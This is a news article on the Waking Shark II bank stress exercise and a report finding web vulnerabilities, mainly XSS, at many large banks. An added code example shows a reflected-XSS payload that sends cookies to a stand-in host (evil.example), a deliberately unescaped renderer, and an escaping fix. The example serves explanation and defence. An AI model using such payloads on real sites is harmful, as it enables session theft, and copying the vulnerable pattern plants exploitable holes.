Did Waking Shark Test the Right Areas of Banking Security?

On the very day that the City of London ran operation Waking Shark II, researchers published an analysis of known bank security incidents and published vulnerabilities since 2000.

The report produced by High Tech Bridge (HTB), Hacking Banking Websites: Myth or Reality?, looks at the world's 50 biggest banks and simply counts the security incidents that have been reported, or the vulnerabilities that have been published, somewhere on the internet. It is by its nature a conservative count: although it cannot be proven, it is generally accepted that banks rarely report or disclose actual incidents themselves. The report also leaves out the DDoS attacks and phishing campaigns known to have hit the major banks. "We didn't take into account the more common DDoS attacks or phishing campaigns as they do not involve security of web application directly," says the report.

Even so, the study as it stands shows that 52% of the world's 50 largest banks have been affected by at least one reported incident or published web vulnerability.

However, Waking Shark II was not designed to test the banks' security, but the sector's ability to withstand stress and maintain operations in the face of a sustained attack. HTB's research suggests that each bank also needs, individually, to test its own website security.

This was a concern raised by David Harley, senior research fellow at ESET, about Waking Shark. "This kind of simulation can be very useful in terms of testing contingency plans, resilience of communication channels, adherence to procedures and protocols and so on, though it’s hard to simulate the sort of conditions of surprise and stress that prevail in a real crisis... What really tests an organization’s security," he continued, "is a breach that couldn’t have been anticipated, the sort of attack that demonstrates how well (or badly) it can expect the unexpected." 

A real test, he suggests, is more likely to come from 'an external attacker – or a pseudo-attacker such as a pen-tester.' Interestingly, the first weakness that either a blackhat or an ethical hacker is likely to look for is cross-site scripting (XSS), the very vulnerability class that dominates HTB's findings.
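To make concrete why XSS is the first thing a tester probes for, the following is an added illustration, not code from the article or from HTB's report. It mimics a bank "search results" page that echoes a query parameter back to the user: one version interpolates the input straight into HTML (reflected XSS), the other escapes it first. The payload string, the page layout and the `reflectsScript` probe are all constructed for this example and are not drawn from any real bank site.

```javascript
// Added example: reflected XSS in a page builder, beside the escaped version.
// Everything here (payload, markup, probe) is constructed for illustration.

// Hypothetical attacker-controlled query string, constructed for this example.
// It closes the surrounding tag and injects a script that exfiltrates cookies.
const PAYLOAD =
  '"><script>document.location="https://evil.example/?c="+document.cookie</script>';

// Vulnerable: user input is dropped into the HTML with no encoding.
function renderVulnerable(query) {
  return `<p>Results for <b>${query}</b></p>`;
}

// Escape the characters that change meaning in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same page, with the query encoded before interpolation.
function renderHardened(query) {
  return `<p>Results for <b>${escapeHtml(query)}</b></p>`;
}

// Crude tester-style probe: does a raw <script> tag survive into the response?
// (A real scanner would also check attribute and JavaScript contexts.)
function reflectsScript(html) {
  return /<script\b/i.test(html);
}

// Run a set of constructed inputs through a renderer and report which ones
// reflect executable markup. Returns the list of offending inputs.
function findReflections(renderer, inputs) {
  return inputs.filter((q) => reflectsScript(renderer(q)));
}

// Constructed sample inputs: one benign, one hostile.
const SAMPLE_INPUTS = ['mortgage rates', PAYLOAD];

// Stand-alone demonstration.
console.log('vulnerable renderer reflects:', findReflections(renderVulnerable, SAMPLE_INPUTS));
console.log('hardened renderer reflects:  ', findReflections(renderHardened, SAMPLE_INPUTS));
```

The escaped output still displays the attacker's text verbatim, so the fix costs nothing functionally; what changes is that the browser treats it as data rather than markup. Output encoding of this kind is the minimum a per-bank web application test should confirm on every reflected parameter.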

Ilia Kolochenko, HTB's CEO, agrees. On the one hand, he told Infosecurity, exercises such as Waking Shark "are definitely useful and help to improve the general state of information security." But on the other hand, he added, "it is not so easy to reproduce the same conditions and same attack scenarios as blackhats will use. Therefore, while such types of event can help to avoid some risks, they will not stop blackhats who have brilliant imagination and apply creativity when planning new attacks."

Waking Shark may have been testing the wrong area, or at least leaving a necessary one untested. "The statistics confirm that even financial institutions should pay more attention to their web application security, not only to protect their customers but to maintain their digital reputation," suggests the report.
